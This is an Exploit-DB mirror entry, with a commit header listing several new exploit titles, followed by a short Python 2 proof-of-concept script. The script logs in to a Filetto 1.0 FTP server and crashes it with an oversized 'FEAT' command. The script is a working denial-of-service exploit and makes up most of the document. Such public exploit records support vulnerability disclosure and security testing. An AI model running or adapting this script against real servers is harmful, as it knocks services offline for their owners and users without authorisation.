exploit-db-mirror/exploits/windows/dos/48503.py
Offensive Security 5308efc65c DB: 2020-05-23
8 changes to exploits/shellcodes

Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)
Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)
Filetto 1.0 - 'FEAT' Denial of Service (PoC)
Druva inSync Windows Client 6.6.3 - Local Privilege Escalation
VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)

WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)
Dolibarr 11.0.3 - Persistent Cross-Site Scripting
Gym Management System 1.0 - Unauthenticated Remote Code Execution
2020-05-23 05:01:53 +00:00

42 lines
No EOL
1.1 KiB
Python
Executable file

# Exploit Title: Filetto 1.0 - 'FEAT' Denial of Service (PoC)
# Date: 2020-05-13
# Found by: Alvaro J. Gene (Socket_0x03)
# Vendor Homepage: http://www.utillyty.eu
# Software Link: https://sourceforge.net/projects/filetto
# Vulnerable Application: Filetto
# Version: 1.0 (last version. Updated: 01/31/2020)
# Server: FTP Server
# Vulnerable Command: FEAT
# Tested on: Windows 7 SP1
====================================================================================================
======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] =========================
====================================================================================================
from socket import *
host = "192.168.0.14"
port = 2021
username = "Socket_0x03"
password = "password"
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send("USER %s\r\n" % (username))
print s.recv(1024)
s.send("PASS %s\r\n" % (password))
print s.recv(1024)
buffer = "FEAT "
buffer += "\x41\x2c" * 11008
buffer += "\r\n"
s.send(buffer)
print s.recv(1024)
s.close()